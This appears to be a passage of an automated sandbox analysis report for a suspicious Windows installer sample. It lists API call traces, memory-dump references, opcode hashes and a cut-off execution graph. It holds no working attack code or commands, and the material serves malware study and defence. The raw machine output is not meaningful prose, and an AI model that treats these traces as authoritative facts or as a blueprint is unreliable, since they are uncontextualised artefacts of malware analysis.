                                                      • GetLastError.KERNEL32(?,1F235C88,1F231D66,00000000,00000000,00000000,?,1F235E85,00000006,FlsSetValue,1F23E190,FlsSetValue,00000000,00000364,?,1F235BC8), ref: 1F235D1F
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,1F235C88,1F231D66,00000000,00000000,00000000,?,1F235E85,00000006,FlsSetValue,1F23E190,FlsSetValue,00000000), ref: 1F235D2D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: 43290477b097d43a86d238f922ecd5cda22fa2f33fe66eb7c6c349143568aff4
                                                      • Instruction ID: 46f02488ceae8214e1256b29cf4e3e7376f211af9d7acbbd26c02b9ee9160eb9
                                                      • Opcode Fuzzy Hash: 43290477b097d43a86d238f922ecd5cda22fa2f33fe66eb7c6c349143568aff4
                                                      • Instruction Fuzzy Hash: 7001ACF6B1123F6BC7114AB99CCDA467758AF8DBB27610A20F90ED7541D721D811CAE0
                                                      APIs
                                                      • DestroyWindow.USER32(?,00000000,00402F6A,?,?,?,00434000,00403500,?), ref: 00402D9D
                                                      • GetTickCount.KERNEL32 ref: 00402DBB
                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                      • ShowWindow.USER32(00000000,00000005,?,?,00434000,00403500,?), ref: 00402DE6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                      • String ID:
                                                      • API String ID: 2102729457-0
                                                      • Opcode ID: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                                      • Instruction ID: 84c2018479133c1a06627c8befec1d2e01839f263682f94960fa8353d768859b
                                                      • Opcode Fuzzy Hash: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                                      • Instruction Fuzzy Hash: 29F0DA30909220BFC7616B24FD4CADB7BA5BB44B11B4145BAF005A11E4D3B95C81CA9D
                                                      APIs
                                                      • _free.LIBCMT ref: 1F23655C
                                                        • Part of subcall function 1F2362BC: IsProcessorFeaturePresent.KERNEL32(00000017,1F2362AB,00000000,?,?,?,?,00000016,?,?,1F2362B8,00000000,00000000,00000000,00000000,00000000), ref: 1F2362BE
                                                        • Part of subcall function 1F2362BC: GetCurrentProcess.KERNEL32(C0000417), ref: 1F2362E0
                                                        • Part of subcall function 1F2362BC: TerminateProcess.KERNEL32(00000000), ref: 1F2362E7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                      • String ID: *?$.
                                                      • API String ID: 2667617558-3972193922
                                                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                      • Instruction ID: 4116a45c0a06221a42495cfc6113b1af40dfb103f6efbdb7d0da5a96cab86644
                                                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                      • Instruction Fuzzy Hash: 8151A3F5E0021A9FDF24CFA8C880AADBBF9EF4C315F258169D554EB304E675AA018B50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _strlen
                                                      • String ID: : $Se.
                                                      • API String ID: 4218353326-4089948878
                                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                      • Instruction ID: 9a7d81025f8b2e8f01742c0ea3cd0e007937121890d01a958f4e30c40e149cc0
                                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                      • Instruction Fuzzy Hash: A111C8F5D043496ECB10CFA89840BDDFBFC9F19205F244096E545E7252E6706602C765
                                                      APIs
                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                        • Part of subcall function 00405A79: CharNextW.USER32(?,?,00424EF0,?,00405AED,00424EF0,00424EF0, 4Wu,?,00436800,0040582B,?,75573420,00436800,00000000), ref: 00405A87
                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                                      • lstrlenW.KERNEL32(00424EF0,00000000,00424EF0,00424EF0, 4Wu,?,00436800,0040582B,?,75573420,00436800,00000000), ref: 00405B2F
                                                      • GetFileAttributesW.KERNEL32(00424EF0,00424EF0,00424EF0,00424EF0,00424EF0,00424EF0,00000000,00424EF0,00424EF0, 4Wu,?,00436800,0040582B,?,75573420,00436800), ref: 00405B3F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                      • String ID: 4Wu
                                                      • API String ID: 3248276644-2004972366
                                                      • Opcode ID: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                                      • Instruction ID: ed71898f9691fad2d221d0acf12a8c788c2999d668287f0dc65a00c2ad5638d3
                                                      • Opcode Fuzzy Hash: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                                      • Instruction Fuzzy Hash: 4CF04425301E5115CA22367A2C44AAF2414DFC236474A073BF842B22D1CA3CA943DDBE
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 1F232903
                                                        • Part of subcall function 1F2335D2: RaiseException.KERNEL32(?,?,?,1F232925,00000000,00000000,00000000,?,?,?,?,?,1F232925,?,1F2421B8), ref: 1F233632
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 1F232920
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                      • String ID: Unknown exception
                                                      • API String ID: 3476068407-410509341
                                                      • Opcode ID: 56bb5bf533c662a73c7317a5a41a58cbf059c8c15b56832d77a80e9077efb15d
                                                      • Instruction ID: afd1a727135b8f37d3ead84d819c089894bfb8620b210e614edb0619d331b27b
                                                      • Opcode Fuzzy Hash: 56bb5bf533c662a73c7317a5a41a58cbf059c8c15b56832d77a80e9077efb15d
                                                      • Instruction Fuzzy Hash: 45F0F4F8E0030EB38B04E6A5EC0499D776C5A0E652BA04261EA14968D0FB70FE16C590
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 0040511C
                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 0040516D
                                                        • Part of subcall function 0040412A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID:
                                                      • API String ID: 3748168415-3916222277
                                                      • Opcode ID: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                      • Instruction ID: de30b2b7089f6fefb08e10281d0b4b3c30be484ea7ef601637de59f0c5b2ee24
                                                      • Opcode Fuzzy Hash: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                      • Instruction Fuzzy Hash: 18015E71A0060CABDF216F11DD80B9B3A26EB94354F104036FA05792D2C3BA8C929B6D
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00405C3C
                                                      • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00434000,00403268,00436000,00436800,00436800,00436800,00436800,00436800,00436800,00403492), ref: 00405C57
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: nsa
                                                      • API String ID: 1716503409-2209301699
                                                      • Opcode ID: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                      • Instruction ID: a4e54dcc62cd1b6bfc855809a1f33464b5edbff741e4ba4f72954512b04b2574
                                                      • Opcode Fuzzy Hash: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                      • Instruction Fuzzy Hash: 58F09076B04204BBEB009F5ADD49ADFB7ACEB91710F10403AF900E7190E2B0AE44CB64
                                                      APIs
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                      • CloseHandle.KERNEL32(?), ref: 00405730
                                                      Strings
                                                      • Error launching installer, xrefs: 0040570D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: Error launching installer
                                                      • API String ID: 3712363035-66219284
                                                      • Opcode ID: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                      • Instruction ID: 962493b9a5858e12d65c81fa64705238b81a3a8385349ca8c6d0e9dfe3a178e2
                                                      • Opcode Fuzzy Hash: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                      • Instruction Fuzzy Hash: 55E0BFB4A00209BFEB109F64ED05F7B76BCE714604F804521BE15F6190D7B4A8118A79
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                      • Instruction ID: 4318c0865f168c3c39c32caca64743d138ecf2e5224254a141b4117f5842e3e1
                                                      • Opcode Fuzzy Hash: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                      • Instruction Fuzzy Hash: 6FA14371E00229CBDF28CFA8C854BADBBB1FF44305F15856AD816BB281C7785A96DF44
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                      • Instruction ID: 8bd9da501ed45a7f5d2d0dfc2be718583217048081f6288eced8fd4e99326474
                                                      • Opcode Fuzzy Hash: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                      • Instruction Fuzzy Hash: D3913370D00229CBDF28CFA8C854BADBBB1FF44305F15812AD816BB291C7795A96CF84
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                      • Instruction ID: cc0f6ab454a14bc981dfc54755cdbe6dc6b21fe19783e5e5045ac21e9f873034
                                                      • Opcode Fuzzy Hash: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                      • Instruction Fuzzy Hash: 57813271E00229CBDB24CFA8C844BADBBB1FF45305F25816AD816BB291C7789A95CF54
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                      • Instruction ID: 36932640a45318c75a18aff77ab64511548531c3f0ac059ca6f487157756e1a6
                                                      • Opcode Fuzzy Hash: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                      • Instruction Fuzzy Hash: DB816831D04229DBDB24CFA8D8447ADBBB0FF44305F15816AE856BB2C0C7785A96CF44
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                      • Instruction ID: ff2225f7ed94bd6a4cfd13171a87750c77ef90a01ce87bb0bc5953b87d28885c
                                                      • Opcode Fuzzy Hash: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                      • Instruction Fuzzy Hash: F3712271E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB281C7795A96DF54
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                      • Instruction ID: 52dfaafe50a83d16d2aca4474dbfbf9792b45fca5ae70f0232ed595026c100c8
                                                      • Opcode Fuzzy Hash: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                      • Instruction Fuzzy Hash: E7713371E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB291C7795A96DF44
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                                      • Instruction ID: fadc0c566b3b685b80e6fde1c1dc985280178bf592964274442c35b5c3ef9333
                                                      • Opcode Fuzzy Hash: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                                      • Instruction Fuzzy Hash: 1D713571E00229DBDF28CF98C844BADBBB1FF44305F15806AD816BB291C7799A96DF44
                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B7C
                                                      • CharNextA.USER32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B8D
                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                      • Instruction ID: 09ddfbf6a96cc3af2c4d2f748c9cef087a74b3384d996a5f3154f8737d8de66f
                                                      • Opcode Fuzzy Hash: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                      • Instruction Fuzzy Hash: 86F0C231904514EFC7129FA5CC00D9FBBB8EF06350B2540A5E800F7351D634FE019BA9

                                                      Execution Graph

                                                      Execution Coverage:6.2%
                                                      Dynamic/Decrypted Code Coverage:9.2%
                                                      Signature Coverage:3.5%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:93
                                                      execution_graph 37630 44dea5 37631 44deb5 FreeLibrary 37630->37631 37632 44dec3 37630->37632 37631->37632 37633 4147f3 37636 414561 37633->37636 37635 414813 37637 41456d 37636->37637 37638 41457f GetPrivateProfileIntW 37636->37638 37641 4143f1 memset _itow WritePrivateProfileStringW 37637->37641 37638->37635 37640 41457a 37640->37635 37641->37640 37642 4287c1 37643 4287d2 37642->37643 37646 429ac1 37642->37646 37647 428818 37643->37647 37648 42881f 37643->37648 37657 425711 37643->37657 37644 4259da 37705 416760 11 API calls 37644->37705 37676 425ad6 37646->37676 37712 415c56 11 API calls 37646->37712 37679 42013a 37647->37679 37707 420244 97 API calls 37648->37707 37650 4260dd 37706 424251 120 API calls 37650->37706 37653 4259c2 37653->37676 37699 415c56 11 API calls 37653->37699 37657->37644 37657->37646 37657->37653 37660 429a4d 37657->37660 37663 422aeb memset memcpy memcpy 37657->37663 37667 4260a1 37657->37667 37675 425a38 37657->37675 37695 4227f0 memset memcpy 37657->37695 37696 422b84 15 API calls 37657->37696 37697 422b5d memset memcpy memcpy 37657->37697 37698 422640 13 API calls 37657->37698 37700 4241fc 11 API calls 37657->37700 37701 42413a 90 API calls 37657->37701 37661 429a66 37660->37661 37662 429a9b 37660->37662 37708 415c56 11 API calls 37661->37708 37666 429a96 37662->37666 37710 416760 11 API calls 37662->37710 37663->37657 37711 424251 120 API calls 37666->37711 37704 415c56 11 API calls 37667->37704 37669 429a7a 37709 416760 11 API calls 37669->37709 37675->37653 37702 422640 13 API calls 37675->37702 37703 4226e0 12 API calls 37675->37703 37680 42014c 37679->37680 37683 420151 37679->37683 37722 41e466 97 API calls 37680->37722 37682 420162 37682->37657 37683->37682 37684 4201b3 37683->37684 37685 420229 37683->37685 37686 4201b8 37684->37686 37687 4201dc 37684->37687 37685->37682 37688 41fd5e 86 API calls 37685->37688 37713 41fbdb 37686->37713 37687->37682 37691 4201ff 37687->37691 37719 41fc4c 37687->37719 37688->37682 37691->37682 37694 42013a 97 API calls 37691->37694 37694->37682 37695->37657 37696->37657 37697->37657 37698->37657 37699->37644 37700->37657 37701->37657 37702->37675 37703->37675 37704->37644 37705->37650 37706->37676 37707->37657 37708->37669 37709->37666 37710->37666 37711->37646 37712->37644 37714 41fbf1 37713->37714 37715 41fbf8 37713->37715 37718 41fc39 37714->37718 37737 4446ce 11 API calls 37714->37737 37727 41ee26 37715->37727 37718->37682 37723 41fd5e 37718->37723 37720 41ee6b 86 API calls 37719->37720 37721 41fc5d 37720->37721 37721->37687 37722->37683 37724 41fd65 37723->37724 37725 41fdab 37724->37725 37726 41fbdb 86 API calls 37724->37726 37725->37682 37726->37724 37728 41ee41 37727->37728 37729 41ee32 37727->37729 37738 41edad 37728->37738 37741 4446ce 11 API calls 37729->37741 37732 41ee3c 37732->37714 37735 41ee58 37735->37732 37743 41ee6b 37735->37743 37737->37718 37747 41be52 37738->37747 37741->37732 37742 41eb85 11 API calls 37742->37735 37744 41ee70 37743->37744 37745 